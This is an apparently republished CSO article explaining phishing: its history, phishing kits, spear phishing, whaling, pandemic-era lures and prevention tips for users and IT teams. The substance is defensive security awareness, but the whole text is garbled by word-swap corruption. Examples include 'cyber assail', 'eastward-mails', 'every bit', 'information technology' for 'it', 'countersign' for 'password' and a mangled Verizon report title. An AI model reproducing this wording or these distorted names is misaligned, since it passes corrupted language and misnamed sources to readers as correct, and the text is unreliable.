What is phishing? How this cyber assail works and how to prevent information technology

Phishing is a method of trying to assemble personal data using deceptive eastward-mails and websites. Here'south what you need to know about this venerable, but increasingly sophisticated, form of cyber assail.

Contributing writer, CSO |

A hook is cast at laptop email with fishing lures amid abstract data.
CHUYN / Getty Images / AKO9

Phishing definition

Phishing is a cyber attack that uses disguised electronic mail every bit a weapon. The goal is to trick the e-mail recipient into believing that the message is something they want or need — a request from their bank, for instance, or a note from someone in their visitor — and to click a link or download an zipper.

What really distinguishes phishing is the form the bulletin takes: the attackers masquerade as a trusted entity of some kind, oftentimes a real or plausibly existent person, or a company the victim might do business organisation with. It'south ane of the oldest types of cyberattacks, dating back to the 1990s, and it'due south nevertheless ane of the most widespread and pernicious, with phishing letters and techniques becoming increasingly sophisticated.

"Phish" is pronounced just like it's spelled, which is to say like the word "fish" — the analogy is of an angler throwing a baited hook out in that location (the phishing email) and hoping y'all seize with teeth. The term arose in the mid-1990s amidst hackers aiming to fox AOL users into giving up their login information. The "ph" is part of a tradition of whimsical hacker spelling, and was probably influenced by the term "phreaking," short for "phone phreaking," an early on form of hacking that involved playing sound tones into telephone handsets to get free phone calls.

Nearly a third of all breaches in the past year involved phishing, according to the 2019 Verizon Information Alienation Investigations Written report. For cyber-espionage attacks, that number jumps to 78%. The worst phishing news for 2019 is that its perpetrators are getting much, much better at it thank you to well-produced, off-the-shelf tools and templates.

Some phishing scams accept succeeded well plenty to make waves:

  • Perhaps i of the most consequential phishing attacks in history happened in 2016, when hackers managed to become Hillary Clinton entrada chair John Podesta to offering up his Gmail countersign.
  • The "fappening" assail, in which intimate photos of a number of celebrities were made public, was originally thought to be a result of insecurity on Apple's iCloud servers, but was in fact the production of a number of successful phishing attempts.
  • In 2016, employees at the University of Kansas responded to a phishing email and handed over admission to their paycheck deposit information, resulting in them losing pay.

What is a phishing kit?

The availability of phishing kits makes information technology easy for cyber criminals, even those with minimal technical skills, to launch phishing campaigns. A phishing kit bundles phishing website resources and tools that need just be installed on a server. One time installed, all the attacker needs to practice is send out emails to potential victims. Phishing kits too equally mailing lists are available on the nighttime web. A couple of sites, Phishtank and OpenPhish, go along oversupply-sourced lists of known phishing kits.

Some phishing kits allow attackers to spoof trusted brands, increasing the chances of someone clicking on a fraudulent link. Akamai'south inquiry provided in its Phishing--Baiting the Hook report found 62 kit variants for Microsoft, 14 for PayPal, seven for DHL, and 11 for Dropbox.

The Duo Labs report, Phish in a Barrel, includes an analysis of phishing kit reuse. Of the 3,200 phishing kits that Duo discovered, 900 (27%) were found on more than one host. That number might really exist higher, even so. "Why don't we see a college percent of kit reuse? Perhaps considering nosotros were measuring based on the SHA1 hash of the kit contents. A single alter to just one file in the kit would appear as ii dissever kits even when they are otherwise identical," said Jordan Wright, a senior R&D engineer at Duo and the report'due south author.

Anatomy of a Phishing Kit [infographic by Duo Security] Duo Security

Analyzing phishing kits allows security teams to track who is using them. "1 of the well-nigh useful things nosotros can learn from analyzing phishing kits is where credentials are being sent. By tracking electronic mail addresses found in phishing kits, we can correlate actors to specific campaigns and even specific kits," said Wright in the report. "It gets even better. Not only can nosotros see where credentials are sent, simply we also run across where credentials merits to exist sent from. Creators of phishing kits commonly use the 'From' header like a signing card, letting us observe multiple kits created by the same author."

Types of phishing

If in that location's a mutual denominator among phishing attacks, it'south the disguise. The attackers spoof their email address so it looks like it's coming from someone else, set up fake websites that wait like ones the victim trusts, and use foreign character sets to disguise URLs.

That said, in that location are a variety of techniques that fall under the umbrella of phishing. In that location are a couple of dissimilar means to break attacks down into categories. One is by the purpose of the phishing attempt. Mostly, a phishing campaign tries to get the victim to do ane of 2 things:

  • Hand over sensitive information. These messages aim to trick the user into revealing important data — frequently a username and password that the assailant can apply to breach a system or business relationship. The classic version of this scam involves sending out an electronic mail tailored to expect similar a bulletin from a major bank; by spamming out the bulletin to millions of people, the attackers ensure that at least some of the recipients will exist customers of that bank. The victim clicks on a link in the message and is taken to a malicious site designed to resemble the banking concern's webpage, and then hopefully enters their username and password. The attacker can now admission the victim's account.
  • Download malware. Like a lot of spam, these types of phishing emails aim to become the victim to infect their ain calculator with malware. Often the messages are "soft targeted" — they might be sent to an HR staffer with an attachment that purports to be a job seeker'due south resume, for case. These attachments are often .zip files, or Microsoft Office documents with malicious embedded code. The most common form of malicious code is ransomware — in 2017 it was estimated that 93% of phishing emails contained ransomware attachments.

Phishing emails can be targeted in several different ways. As we noted, sometimes they aren't targeted at all; emails are sent to millions of potential victims to try to trick them into logging in to fake versions of very pop websites. Ironscales has tallied the well-nigh popular brands that hackers employ in their phishing attempts.

Of the 50,000-plus fake login pages the company monitored, these were the tiptop brands attackers used:

  • PayPal: 22%
  • Microsoft: 19%
  • Facebook: 15%
  • eBay: 6%
  • Amazon: 3%

Other times, attackers might send "soft targeted" emails at someone playing a particular function in an arrangement, even if they don't know anything about them personally. Some phishing attacks aim to get login information from, or infect the computers of, specific people. Attackers dedicate much more energy to tricking those victims, who have been selected because the potential rewards are quite high.

Spear phishing

When attackers try to arts and crafts a message to appeal to a specific private, that'due south called spear phishing. (The paradigm is of a fisherman aiming for 1 specific fish, rather than just casting a baited hook in the water to see who bites.) Phishers identify their targets (sometimes using information on sites like LinkedIn) and use spoofed addresses to transport emails that could plausibly await like they're coming from co-workers. For instance, the spear phisher might target someone in the finance department and pretend to exist the victim's manager requesting a large bank transfer on short notice.

Whaling

Whale phishing, or whaling, is a course of spear phishing aimed at the very large fish — CEOs or other high-value targets. Many of these scams target company lath members, who are considered specially vulnerable: they have a great bargain of authority within a company, but since they aren't total-fourth dimension employees, they often utilise personal email addresses for business-related correspondence, which doesn't have the protections offered past corporate electronic mail.

Gathering enough information to trick a really high-value target might take time, but it can have a surprisingly high payoff. In 2008, cybercriminals targeted corporate CEOs with emails that claimed to have FBI subpoenas attached. In fact, they downloaded keyloggers onto the executives' computers — and the scammers' success rate was 10%, snagging almost 2,000 victims.

Other types of phishing include clone phishing, vishing, snowshoeing. This article explains the differences between the various types of phishing attacks.

Why phishing increases during a crisis

Criminals rely on deception and creating a sense of urgency to accomplish success with their phishing campaigns. Crises such as the coronavirus pandemic requite those criminals a big opportunity to lure victims into taking their phishing bait.

During a crisis, people are on edge. They desire data and are looking for direction from their employers, the regime, and other relevant authorities. An e-mail that appears to be from one of these entities and promises new information or instructs recipients to consummate a chore apace volition likely receive less scrutiny than prior to the crisis. An impulsive click later, and the victim'southward device is infected or account is compromised.

The following screen capture is a phishing campaign discovered by Mimecast that attempts to steal login credentials of the victim's Microsoft OneDrive business relationship. The attacker knew that with more people working from home, sharing of documents via OneDrive would be mutual.

mimecast wfh phishing campaign 1 Mimecast

The next ii screens are from phishing campaigns identified by Proofpoint. The starting time asks victims to load an app on their device to "run simulations of the cure" for COVID-19. The app, of course, is malware. The second appears to be from Canada'south Public Health Agency and asks recipients to click on a link to read an of import letter. The link goes to a malicious certificate.

malicious spoofed foldinghome email with link to malware Proofpoint
fake public health agency of canada lure Proofpoint

How to prevent phishing

The best mode to learn to spot phishing emails is to study examples captured in the wild! This webinar from Cyren starts with a look at a existent live phishing website, masquerading every bit a PayPal login, tempting victims hand over their credentials. Bank check out the start minute or and then of the video to run into the telltale signs of a phishing website.

More examples tin can be constitute on a website maintained by Lehigh University's technology services department where they go along a gallery of contempo phishing emails received by students and staff.

[ See 15 real-world phishing examples — and how to recognize them  ]

In that location too are a number of steps yous can take and mindsets you should get into that will keep you from becoming a phishing statistic, including:

  • Ever cheque the spelling of the URLs in electronic mail links before you click or enter sensitive information
  • Watch out for URL redirects, where you're subtly sent to a different website with identical design
  • If you receive an email from a source y'all know but it seems suspicious, contact that source with a new email, rather than but hitting reply
  • Don't postal service personal data, like your birthday, vacation plans, or your accost or phone number, publicly on social media
q12019 knowbe4 phishing infographic KnowBe4

These are the top-clicked phishing messages according to a Q2 2018 report from security awareness training company KnowBe4

If you piece of work in your company's IT security department, you can implement proactive measures to protect the arrangement, including:

  • "Sandboxing" inbound electronic mail, checking the safety of each link a user clicks
  • Inspecting and analyzing spider web traffic
  • Pen-testing your organization to notice weak spots and utilise the results to educate employees
  • Rewarding good behavior, perhaps by showcasing a "take hold of of the day" if someone spots a phishing electronic mail

Josh Fruhlinger is a writer and editor who lives in Los Angeles.

Copyright © 2020 IDG Communications, Inc.